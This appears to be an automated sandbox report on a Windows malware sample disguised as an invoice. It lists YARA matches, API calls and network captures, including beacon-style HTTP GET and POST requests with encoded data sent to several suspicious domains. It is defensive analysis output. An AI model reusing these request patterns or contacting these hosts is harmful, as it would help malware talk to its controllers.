Windows Analysis Report
Revised Invoice H000127896.exe

AI detected suspicious sample

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2536793601.0000000008050000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3292716261.0000000003D00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3291336208.0000000002120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2532355748.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3292632667.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2532985374.0000000004FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3292694436.0000000002820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3292411346.0000000001220000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: Revised Invoice H000127896.exe

Joe Sandbox ML: detected

Source: Revised Invoice H000127896.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: replace.pdb source: svchost.exe, 00000002.00000002.2532507526.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2490823870.000000000321A000.00000004.00000020.00020000.00000000.sdmp, MUjPkRkjOWKkX.exe, 00000004.00000002.3292070177.0000000000F38000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: replace.pdbGCTL source: svchost.exe, 00000002.00000002.2532507526.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2490823870.000000000321A000.00000004.00000020.00020000.00000000.sdmp, MUjPkRkjOWKkX.exe, 00000004.00000002.3292070177.0000000000F38000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: MUjPkRkjOWKkX.exe, 00000004.00000000.2443952915.000000000080E000.00000002.00000001.01000000.00000005.sdmp, MUjPkRkjOWKkX.exe, 00000007.00000002.3291334317.000000000080E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: Revised Invoice H000127896.exe, 00000000.00000003.2068504373.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, Revised Invoice H000127896.exe, 00000000.00000003.2068190374.0000000004660000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2422918073.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2420841777.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2532582693.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2532582693.000000000399E000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000005.00000002.3292894877.0000000002A40000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000005.00000003.2532709579.00000000026B0000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000002.3292894877.0000000002BDE000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000005.00000003.2534511525.000000000288D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Revised Invoice H000127896.exe, 00000000.00000003.2068504373.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, Revised Invoice H000127896.exe, 00000000.00000003.2068190374.0000000004660000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2422918073.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2420841777.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2532582693.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2532582693.000000000399E000.00000040.00001000.00020000.00000000.sdmp, replace.exe, replace.exe, 00000005.00000002.3292894877.0000000002A40000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000005.00000003.2532709579.00000000026B0000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000002.3292894877.0000000002BDE000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000005.00000003.2534511525.000000000288D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: replace.exe, 00000005.00000002.3293409108.000000000306C000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.3291550327.0000000002580000.00000004.00000020.00020000.00000000.sdmp, MUjPkRkjOWKkX.exe, 00000007.00000000.2598292163.000000000305C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2821347362.0000000039BDC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: replace.exe, 00000005.00000002.3293409108.000000000306C000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.3291550327.0000000002580000.00000004.00000020.00020000.00000000.sdmp, MUjPkRkjOWKkX.exe, 00000007.00000000.2598292163.000000000305C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2821347362.0000000039BDC000.00000004.80000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00452492
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00442886
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_004788BD
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_004339B6
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,	0_2_0045CAFA
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00431A86
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Code function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,	0_2_0044BD27
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Code function: 0_2_0045DE8F FindFirstFileW,FindClose,	0_2_0045DE8F
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Code function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0044BF8B
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_0213C240 FindFirstFileW,FindNextFileW,FindClose,	5_2_0213C240

Source: C:\Windows\SysWOW64\replace.exe	Code function: 4x nop then xor eax, eax		5_2_02129A70
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4x nop then mov ebx, 00000004h		5_2_029304E0

Source: Joe Sandbox View	IP Address: 217.160.0.27 217.160.0.27
Source: Joe Sandbox View	IP Address: 3.33.130.190 3.33.130.190

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe

Code function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,

0_2_004422FE

Source: global traffic	HTTP traffic detected: GET /9eeu/?npb=3FKhBrgHxb5d5XX&jz=sYxoUF2rFRCkhaAkZ/A9Uj7dMzTBzKsd56kaE+tBLdvFK0LLAdAC/H8PE2DtjqQpoemNjozj05nG5pG/fmy7eOvuwMQDTc0cfupU/VfFqgUlIE8j+TMRgVEnKsfoFtzhDw== HTTP/1.1Host: www.07t90q.vipAccept: /Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /4yov/?jz=wLmY7AOB32o0S2u42dQo01BhAozElJEy6rFAsgDZdNn+sW1g/TF+eJ3R19ZQOPzynTi6ZGviANY3o1+5ycRViPNI2Nw+8mxels4+I7slmp23cyQYmVgQCmd7LylHNAhJBA==&npb=3FKhBrgHxb5d5XX HTTP/1.1Host: www.concept.pinkAccept: /Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /6tyq/?jz=jni3yiZJ4S7NmP87TLfQaIY/X77PcNTCOCcZxoXAf1kPTUY8H/4jiZTjzWgxt/+cQPOpbdgRSQIQgbB1DSTxgzvKKTE3COfRXcz2obzALE1MyEAjEb6tnUq41l0wGlUpcQ==&npb=3FKhBrgHxb5d5XX HTTP/1.1Host: www.5oxzis.topAccept: /Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /j39u/?jz=Bz1f0c7bYWyPEXgQH2KhVZZ8APOK/AslnFtnj2cpqvgmCRIzB1oQIQo/LvP87UgGwTfaSD+LVTW+9AK3Nxg5qUhvSHaGZLmYP9ngab3X35l8/z/r5KgCJlFWcHojvmaM7w==&npb=3FKhBrgHxb5d5XX HTTP/1.1Host: www.kuaimaolife.shopAccept: /Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36

Source: global traffic	DNS traffic detected: DNS query: www.07t90q.vip
Source: global traffic	DNS traffic detected: DNS query: www.concept.pink
Source: global traffic	DNS traffic detected: DNS query: www.5oxzis.top
Source: global traffic	DNS traffic detected: DNS query: www.kuaimaolife.shop
Source: global traffic	DNS traffic detected: DNS query: www.nodigitalsmoke.org

Source: unknown

HTTP traffic detected: POST /4yov/ HTTP/1.1Host: www.concept.pinkAccept: */*Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brOrigin: http://www.concept.pinkReferer: http://www.concept.pink/4yov/Connection: closeContent-Length: 203Content-Type: application/x-www-form-urlencodedCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36Data Raw: 6a 7a 3d 39 4a 4f 34 34 31 65 45 79 33 52 4e 55 48 36 6c 6f 64 38 50 2f 31 70 6e 4f 49 43 4d 39 59 30 4c 34 35 51 33 75 79 62 4f 48 65 6e 42 74 6b 31 2b 67 58 78 33 55 74 32 6a 6c 63 52 73 48 4c 6a 41 6e 44 7a 4c 52 79 2f 71 41 75 6b 45 74 67 61 37 6d 5a 38 37 76 66 46 50 38 2f 74 2b 6f 44 74 56 6f 4d 5a 30 51 4b 49 39 75 4c 66 2b 41 44 59 54 33 55 68 59 57 55 6c 4a 4f 51 5a 74 51 57 78 47 55 68 59 32 6c 34 4f 41 5a 65 4f 48 44 48 65 68 51 46 30 74 67 39 50 6c 76 73 32 74 7a 6a 32 75 49 4a 63 42 53 4f 41 4e 6f 4f 31 66 38 70 45 70 4b 6d 75 71 41 4e 2f 55 57 37 74 4e 64 54 56 68 61 4c 36 6d 72 45 73 3d Data Ascii: jz=9JO441eEy3RNUH6lod8P/1pnOICM9Y0L45Q3uybOHenBtk1+gXx3Ut2jlcRsHLjAnDzLRy/qAukEtga7mZ87vfFP8/t+oDtVoMZ0QKI9uLf+ADYT3UhYWUlJOQZtQWxGUhY2l4OAZeOHDHehQF0tg9Plvs2tzj2uIJcBSOANoO1f8pEpKmuqAN/UW7tNdTVhaL6mrEs=

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 27 Sep 2024 07:08:31 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 27 Sep 2024 07:08:34 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 27 Sep 2024 07:08:37 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 27 Sep 2024 07:08:39 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 27 Sep 2024 07:08:45 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
